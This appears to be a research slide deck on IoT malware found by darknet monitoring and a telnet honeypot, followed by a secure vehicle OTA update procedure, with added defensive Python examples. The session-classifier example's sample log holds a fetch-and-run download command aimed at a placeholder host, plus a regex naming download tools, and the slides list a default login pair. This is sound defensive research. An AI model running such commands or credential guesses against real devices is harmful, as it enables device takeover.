Security issues related to Vehicles and Secure OTA Software Updates
Masashi Eto, Research Manager, Cybersecurity Human Resource Development Research Center, NICT, Japan

Outline
- Observing current IoT Attacks
  – Darknet basis attack observation
- Understanding Infected IoT devices
  – IoT Honeypot and Sandbox
- Secure OTA Updates for ITS/IoT software/firmware
  – As one of the countermeasures against threats in ITS/IoT environments

Observing current IoT Attacks

Scanning observation by darknet monitoring
- Darknet: an unused IP address range, which is efficient for cyber-attack observation
- Capturing packets through the darknet in real time
[Figure: darknet traffic visualisations "Atlas" and "Allview"; colour indicates the protocol type: UDP, TCP SYN, TCP SYN/ACK, TCP Other, ICMP; Atlas shows port 23 only]

23/tcp Scan from Embedded Devices
[Figure: 23/tcp scan traffic, Oct. 2013 – Dec. 2014]
Infected devices: home routers, web cameras, NAS (Network Attached Storage), etc.

The attacking hosts are IoT devices: 150,000 attacking IPs and 361 models observed in 4 months

Why IoT devices?
- 24/7 online
- No AV
- Weak/default login passwords
- Global IP address and open to the Internet

Understanding Infected IoT devices

We would like to know:
- Malware: What kind of malware? How many different kinds?
- Targets: What IoT devices are targeted?
- Monetization: What do the attackers do after compromising these devices?
We have developed the first honeypot for IoT.

Challenges
- Honeypot: IoT devices listening on Telnet
  – Emulating diverse IoT devices
  – Capturing malware of different CPU architectures
- Sandbox: IoTBOX
  – IoT malware of different CPU architectures: ARM, MIPSEL, SUPERH, PPC, X86, MIPS
  – Running malware of different CPU architectures

Emulating different actions
Device profile (e.g. an ADSL router):
- Banner interaction: Do Echo, Do NAWS, Will Echo (*NAWS: Negotiate About Window Size)
- Welcome message & login prompt
- Authentication: different user ID/password (e.g. root / 12345)
- Command interaction: different responses per architecture (e.g. "cat /bin/sh" answered with an ARM or a MIPS response)
How the profiles are built:
- Different banner interactions: scanning the Internet on port 23 to collect different banners
- Different user ID/passwords: obtain weak/default ID/passwords by web search
- Different interactions/responses: learn from actual devices; a system with a general configuration for embedded devices (e.g. OpenWRT)

IoTPOT results
During 122 days of operation [April 01 to July 31, 2015]:
- 250,000 unique hosts observed
- 90,394 malware download attempts
- Malware of 11 different CPU architectures
- 93% of downloaded binaries were new to VirusTotal (2015/09)

General flow of telnet based attacks
[Figure: attacker (or an already-infected IoT device) → target IoT device → malware DL server → C&C server]
1. Login attempts using a dictionary attack
2. Series of Telnet commands
3. Download of malware (binary or shell) from the malware DL server
4. Attack commands from the C&C server: scan 23/TCP, DoS
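As an added example (not from the slides or from IoTPOT itself), detection logic that replays this four-step flow over constructed honeypot session records and reports how far each source got; the key=value record format and the log lines are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed telnet-session records (not IoTPOT output); the record format
# is an assumption made for this example.
LOG = """\
2015-04-01T00:00:01 src=198.51.100.7 event=login user=root ok=0
2015-04-01T00:00:02 src=198.51.100.7 event=login user=admin ok=0
2015-04-01T00:00:03 src=198.51.100.7 event=login user=root ok=1
2015-04-01T00:00:04 src=198.51.100.7 event=cmd text="cat /bin/sh"
2015-04-01T00:00:05 src=198.51.100.7 event=cmd text="wget http://dl.example.invalid/a.sh"
2015-04-01T00:00:06 src=198.51.100.7 event=cmd text="sh a.sh"
2015-04-01T00:00:10 src=203.0.113.9 event=login user=root ok=0
2015-04-01T00:00:11 src=203.0.113.9 event=login user=root ok=0
2015-04-01T00:00:12 src=203.0.113.9 event=login user=root ok=0
2015-04-01T00:00:20 src=192.0.2.5 event=login user=root ok=1
2015-04-01T00:00:21 src=192.0.2.5 event=cmd text="cat /bin/sh"
"""

LINE_RE = re.compile(r'src=(?P<src>\S+) event=(?P<event>\w+)'
                     r'(?: user=\S+ ok=(?P<ok>[01]))?(?: text="(?P<text>[^"]*)")?')
# Commands that fetch a dropper or binary from a malware DL server (step 3).
DOWNLOAD_RE = re.compile(r'\b(?:wget|tftp|ftpget|curl)\b')

def classify_sessions(log, dict_threshold=2):
    """Map each source IP to the highest step of the telnet attack flow seen:
    1 = dictionary login attempts (>= dict_threshold failures), 2 = logged in and
    issuing commands (e.g. architecture probing), 3 = malware download requested.
    Step 4 (C&C attack commands) happens after infection and is not visible here."""
    fails = defaultdict(int)
    stage = defaultdict(int)
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src = m['src']
        if m['event'] == 'login' and m['ok'] == '0':
            fails[src] += 1
            if fails[src] >= dict_threshold:
                stage[src] = max(stage[src], 1)
        elif m['event'] == 'cmd':
            stage[src] = max(stage[src], 2)
            if DOWNLOAD_RE.search(m['text'] or ''):
                stage[src] = 3
    return dict(stage)

def sessions_at_step(log, step):
    """Source IPs that reached at least the given step (e.g. 3 = download seen)."""
    return sorted(src for src, s in classify_sessions(log).items() if s >= step)
```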

Attack Example-1: DNS Water Torture attacks
[Figure: attack diagram]

Attack Example-2: Click fraud
Infected devices imitate user clicks to advertising web sites.
[Figure: infected devices]

Attack Example-3: Stealing credentials from PPV
Particular set-top boxes are being targeted (such as Dreambox).
[Figure: credential theft]

Looking back on devices visiting IoTPOT
- More than 60 different types (361 models) of devices visit IoTPOT
- We scan back on port 23/TCP and 80/TCP
[Figure: bar chart of Number of IP Addresses per Device Type; the largest type accounts for 10,734 addresses, the next 4,856, then 1,391, with a long tail down to single digits]

Web interfaces of devices attacking us

Categorizing IoT device types infected by malware
[Table with columns Category / Group / Device]
Categories: Surveillance; Industrial Control System; Gateway/Modem; Personal; Telephone System; Broadcasting Facility; Other
Devices: IP …; Solid State Recorder; Internet Communication Module; Data Acquisition Server; BACnet I/O Module; Web Camera; Bridge; Personal Video Recorder; Security Appliance; Home Automation Gateway; VoIP Gateway; IP Phone; Digital Video Broadcaster; Digital Video Scaler; GSM Router; Video Encoder/Decoder; Analog Phone Adapter; Set-top Box; Parking Management System; LED display control system; Heat Pump; Fire Alarm System; Disk Recording System; Optical Imaging Facility; Fingerprint Scanner

ASes with more than 1,000 infected IoT devices
[Figure]

Key findings through our challenges
- Malware
  – At least 6 DDoS malware families target IoT devices via Telnet
  – Malware samples of 11 different CPU architectures were captured
  – 93% of samples are new to VirusTotal
  – One family has quickly evolved to target more devices, with as many as 9 different CPU architectures
- Targets
  – More than 60 types (361 models) of IoT devices are infected
- Monetization
  – 11 types of DDoS attacks
  – Scans (TCP/23, 80, 8080, 5916 and UDP/123, 3143)
  – Fake web hosting
  – Click fraud attacks
  – Stealing PPV credentials, and so on

Secure OTA Updates for ITS/IoT software/firmware
- One of the countermeasures against threats in ITS/IoT environments -

Development of an ITU-T Recommendation
- ITU-T: International Telecommunication Union, Telecom sector
  – SG17: responsible for security standards
- Title of Recommendation
  – "Secure software update capability for ITS communications devices" (X.itssec-1)
- Purpose
  – To provide common methods to update the software by a secure procedure, including security controls and a protocol definition
  – Adoption of the Recommendation is not mandatory for the automotive industry, but the Recommendation would be a guideline of baseline security for networked vehicles
- Editors
  – Masashi Eto (NICT)
  – Koji Nakao (KDDI/NICT)

Secure OTA Updates for ITS/IoT software/firmware: general model of a networked vehicle
[Figure: Supplier; Car Manufacturer / Garage center; Update Server / log database; communication path (the focused area); Vehicle Mobile Gateway (Head Unit); in-vehicle devices: Aftermarket Information Device, On-board Information Device, Power Management Control ECU, Seat Belt Control ECU, Driving Support ECU, Parking Assist ECU, Skid Control ECU, etc.]
This procedure is under development for an ITU-T Recommendation (to be fixed in September 2016).

An example of an ITS software remote update procedure (messages between update server, vehicle gateway, ECUs and the user)
1. Request for diagnosis of software status
2. Result of diagnosis with software status
3. Report of results of the ECUs in a vehicle
4. Receipt for submission of the diagnosis report
5. Request for the update module
6. Update module is provided
7. Notification to the user (driver) of the updates
8. Confirmation for the update
9. Request for updates to the ECUs
10. Results of updates in the ECUs
11. Report of application of the update
12. Confirmation from the update server
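An added example, not the Recommendation's own protocol or code, that walks the twelve steps for one vehicle with the checks a gateway would want at each step: it assumes a symmetric key shared by update server and gateway to authenticate messages, binds the module to its manifest with a SHA-256 digest, refuses downgrades, and gates installation on the driver's confirmation.

```python
import hashlib
import hmac
import json

# Assumptions for this example (not from the Recommendation text): a symmetric
# key shared by update server and vehicle gateway authenticates each message,
# and the update module is bound to its manifest by a SHA-256 digest.
KEY = b"constructed-demo-key"

def auth(msg):  # attach a MAC over the canonical JSON encoding of the message
    body = json.dumps(msg, sort_keys=True).encode()
    return {**msg, "mac": hmac.new(KEY, body, hashlib.sha256).hexdigest()}

def check(msg):  # recompute the MAC; a forged or modified message fails here
    body = json.dumps({k: v for k, v in msg.items() if k != "mac"}, sort_keys=True).encode()
    return hmac.compare_digest(msg["mac"], hmac.new(KEY, body, hashlib.sha256).hexdigest())

def run_update(ecus, catalogue, user_confirms, tamper=None):
    """Walk the 12-step procedure. ecus: {ecu name: installed version};
    catalogue: {ecu name: (version, module bytes)} held by the update server;
    user_confirms(ecu, version) models the driver; tamper alters the module in transit."""
    steps = []
    # Steps 1-4: diagnosis request, ECU version report and receipt are all MAC-checked
    for t in ("diagnose_request", "diagnose_report"):
        if not check(auth({"type": t, "ecus": ecus})):
            return ["rejected"], ecus
    steps += ["diagnose", "receipt"]
    # Steps 5-6: request a module only for ECUs that are behind (never downgrade)
    for name, (ver, blob) in catalogue.items():
        if ver <= ecus.get(name, 0):
            continue
        manifest = auth({"type": "module", "ecu": name, "version": ver,
                         "sha256": hashlib.sha256(blob).hexdigest()})
        delivered = tamper(blob) if tamper else blob
        steps.append("module")
        # Steps 7-8: notify the driver and wait for confirmation
        if not user_confirms(name, ver):
            steps.append("declined")
            continue
        # Step 9: verify the manifest MAC and the module digest before the ECU is touched
        if not check(manifest) or hashlib.sha256(delivered).hexdigest() != manifest["sha256"]:
            steps.append("integrity_failure")
            continue
        ecus[name] = ver                      # Step 10: ECU reports the update result
        steps.append("applied")
    # Steps 11-12: gateway reports the applied updates, server confirms and logs them
    steps.append("confirmed" if check(auth({"type": "apply_report", "ecus": ecus})) else "rejected")
    return steps, ecus
```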

Conclusion: Security Key Controls for ITS/IoT environments
1. Observation/analysis and vulnerability detection
2. Malware/intrusion detection
3. Remote curing method for vulnerable IoT devices
4. Remote OTA Software Update (ITU-T)
5. Data confidentiality – light-weight crypto
6. Appropriate authentication and access control
7. Incident handling and information (threat) sharing
[Figure: IoT device environments / the networked car environments]

Thank you for your attention!